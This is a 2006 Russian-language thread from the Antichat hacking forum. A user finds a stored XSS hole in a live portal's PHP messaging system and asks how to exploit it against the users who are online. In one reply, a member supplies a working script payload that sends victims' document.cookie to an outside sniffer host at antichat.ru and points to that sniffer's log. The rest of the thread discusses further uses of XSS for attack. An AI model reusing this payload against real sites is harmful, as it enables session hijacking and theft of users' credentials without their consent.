ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Что можно сделать?
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Что можно сделать?
  #1  
Старый 14.08.2006, 23:02
Аватар для INDAHO
INDAHO
Новичок
Регистрация: 15.01.2006
Сообщений: 11
Провел на форуме:
118825

Репутация: 1
Отправить сообщение для INDAHO с помощью ICQ
По умолчанию Что можно сделать?
И так есть портал , в нем есть сам саит, чат, форум, и системка мгновенных сообщений всем юзерам он-лаина, она на php ... так вот в неи есть активная xss , после добавления сообщения с хсс , алерт вызывается у всех пользователей что он-лаин. Сам скрипт был такои:
Код:
"><script>alert(document.cookie);</script>
тоесть никакие знаки не фильтруются. Так вот какои вопрос: что можно сделать ... чего добится? Извините за ньюбство Но просто хотелось бы знать многие варианты действий, которые можно совершить.
 

  #2  
Старый 15.08.2006, 10:20
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию
Я только сейчас понимаю как это тяжело каждый раз объяснять, что нужно делать в XSS.
Вообщем, в поиске на а-чате или Googool забей "XSS снифер". Там посмотри - должен сам разобраться.
 

  #3  
Старый 15.08.2006, 11:28
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
Цитата:
Сообщение от INDAHO  
Код:
"><script>alert(document.cookie);</script>
тоесть никакие знаки не фильтруются. Так вот какои вопрос: что можно сделать ... чего добится? Извините за ньюбство Но просто хотелось бы знать многие варианты действий, которые можно совершить.
1) Юзай сниффер!
Вот те мануал http://antichat.ru/sniff/
Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg
Лог сниффера: http://antichat.ru/sniff/log.php
Можешь и персональный юзать например в http://s.netsec.ru
Далее в алерт впихаешь сниффа + документ кукис ... чтоб заполучить кукисы жертвы
Например:
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Как только скрипт выполнится , можешь посмотреть на логи сниффера и хитро улыбатся =)
Последний раз редактировалось Electro; 15.08.2006 в 11:32..
 

  #4  
Старый 15.08.2006, 13:55
Аватар для INDAHO
INDAHO
Новичок
Регистрация: 15.01.2006
Сообщений: 11
Провел на форуме:
118825

Репутация: 1
Отправить сообщение для INDAHO с помощью ICQ
По умолчанию
Спасиб за инфу!) Но я хотел бы знать, кроме "утаскивания" куков, можно ли чтонить еще сделать?
 

  #5  
Старый 15.08.2006, 14:06
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
DDos Имхо можно сделать!
шутка
Вот тебе еще один мануал открй для себя многое
http://forum.antichat.ru/thread20140.html
Последний раз редактировалось Electro; 15.08.2006 в 14:11..
 

  #6  
Старый 15.08.2006, 15:33
Аватар для INDAHO
INDAHO
Новичок
Регистрация: 15.01.2006
Сообщений: 11
Провел на форуме:
118825

Репутация: 1
Отправить сообщение для INDAHO с помощью ICQ
По умолчанию
Цитата:
Сообщение от Electro  
DDos Имхо можно сделать!
шутка
Вот тебе еще один мануал открй для себя многое
http://forum.antichat.ru/thread20140.html
этот мануал я читал ... =( Кукисы мне просто не нужны ... да и получить их там неполучается ...

Разъясню что есть, есть портал на котором есть такая штука как мгновенные сообщения пользователям , что на саите , это сообщение открывается в небольшом маленьком php окошке ... но это окошко никаких куков не содержит ... я отправлял сообщение со скриптом на снифер ... но в логе снифера отображаются только ИПы и откуда они были направлены (тоесть с адреса того окна)
Так что утащить куки не получается ...
 

  #7  
Старый 15.08.2006, 15:39
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию
Цитата:
Сообщение от INDAHO  
И так есть портал , в нем есть сам саит, чат, форум, и системка мгновенных сообщений всем юзерам он-лаина, она на php
ХSS можешь исаользовать на чате и в форуме
Кстати в мануале написано где и как можно использовать активную или пассивную XSS .. больше вариантов нет по использыванию XSS
Последний раз редактировалось Electro; 15.08.2006 в 15:44..
 

  #8  
Старый 15.08.2006, 15:49
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию
Говорим спасибо Electro за ответ, а тему закрываем =) Ибо больше чем кража кук ты ничего не сделаешь.Закрыто.

P.S. а сам уезжаю отдыхать =)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Из жизни первобытных программистов tclover Болталка 3 12.08.2006 11:55
Есть шелл на винде. Что можно сделать? bandera Windows 5 05.07.2006 17:23
vbs-нутый зверек по имени batch lexa Чужие Статьи 8 15.06.2006 03:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ